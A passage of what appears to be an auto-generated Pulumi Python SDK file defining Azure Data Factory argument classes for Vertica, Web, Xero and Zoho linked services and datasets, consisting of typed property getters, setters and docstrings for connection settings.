return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class VerticaTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Vertica dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'VerticaTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class WebAnonymousAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
url: Any):
"""
A WebLinkedService that uses anonymous authentication to communicate with an HTTP endpoint.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'Anonymous')
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebBasicAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
password: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
url: Any,
username: Any):
"""
A WebLinkedService that uses basic authentication to communicate with an HTTP endpoint.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password for Basic authentication.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
:param Any username: User name for Basic authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'Basic')
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "url", url)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
The password for Basic authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def username(self) -> Any:
"""
User name for Basic authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: Any):
pulumi.set(self, "username", value)
@pulumi.input_type
class WebClientCertificateAuthenticationArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
password: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
pfx: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']],
url: Any):
"""
A WebLinkedService that uses client certificate based authentication to communicate with an HTTP endpoint. This scheme follows mutual authentication; the server must also provide valid credentials to the client.
:param pulumi.Input[str] authentication_type: Type of authentication used to connect to the web table source.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for the PFX file.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] pfx: Base64-encoded contents of a PFX file.
:param Any url: The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "authentication_type", 'ClientCertificate')
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "pfx", pfx)
pulumi.set(__self__, "url", url)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
Type of authentication used to connect to the web table source.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Password for the PFX file.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def pfx(self) -> pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]:
"""
Base64-encoded contents of a PFX file.
"""
return pulumi.get(self, "pfx")
@pfx.setter
def pfx(self, value: pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]):
pulumi.set(self, "pfx", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The URL of the web service endpoint, e.g. http://www.microsoft.com . Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@pulumi.input_type
class WebLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
type_properties: pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Web linked service.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']] type_properties: Web linked service properties.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'Web')
pulumi.set(__self__, "type_properties", type_properties)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="typeProperties")
def type_properties(self) -> pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']]:
"""
Web linked service properties.
"""
return pulumi.get(self, "type_properties")
@type_properties.setter
def type_properties(self, value: pulumi.Input[Union['WebAnonymousAuthenticationArgs', 'WebBasicAuthenticationArgs', 'WebClientCertificateAuthenticationArgs']]):
pulumi.set(self, "type_properties", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class WebTableDatasetArgs:
def __init__(__self__, *,
index: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
path: Optional[Any] = None,
structure: Optional[Any] = None):
"""
The dataset points to a HTML table in the web page.
:param Any index: The zero-based index of the table in the web page. Type: integer (or Expression with resultType integer), minimum: 0.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any path: The relative URL to the web page from the linked service URL. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "index", index)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'WebTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if path is not None:
pulumi.set(__self__, "path", path)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter
def index(self) -> Any:
"""
The zero-based index of the table in the web page. Type: integer (or Expression with resultType integer), minimum: 0.
"""
return pulumi.get(self, "index")
@index.setter
def index(self, value: Any):
pulumi.set(self, "index", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def path(self) -> Optional[Any]:
"""
The relative URL to the web page from the linked service URL. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[Any]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class XeroLinkedServiceArgs:
def __init__(__self__, *,
host: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
consumer_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
private_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Xero Service linked service.
:param Any host: The endpoint of the Xero server. (i.e. api.xero.com)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] consumer_key: The consumer key associated with the Xero application.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] private_key: The private key from the .pem file that was generated for your Xero private application. You must include all the text from the .pem file, including the Unix line endings(
).
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Xero')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if consumer_key is not None:
pulumi.set(__self__, "consumer_key", consumer_key)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if private_key is not None:
pulumi.set(__self__, "private_key", private_key)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def host(self) -> Any:
"""
The endpoint of the Xero server. (i.e. api.xero.com)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="consumerKey")
def consumer_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The consumer key associated with the Xero application.
"""
return pulumi.get(self, "consumer_key")
@consumer_key.setter
def consumer_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "consumer_key", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="privateKey")
def private_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The private key from the .pem file that was generated for your Xero private application. You must include all the text from the .pem file, including the Unix line endings(
).
"""
return pulumi.get(self, "private_key")
@private_key.setter
def private_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "private_key", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class XeroObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Xero Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'XeroObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ZohoLinkedServiceArgs:
def __init__(__self__, *,
endpoint: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Zoho server linked service.
:param Any endpoint: The endpoint of the Zoho server. (i.e. crm.zoho.com/crm/private)
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token for Zoho authentication.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "endpoint", endpoint)
pulumi.set(__self__, "type", 'Zoho')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter
def endpoint(self) -> Any:
"""
The endpoint of the Zoho server. (i.e. crm.zoho.com/crm/private)
"""
return pulumi.get(self, "endpoint")
@endpoint.setter
def endpoint(self, value: Any):
pulumi.set(self, "endpoint", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token for Zoho authentication.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
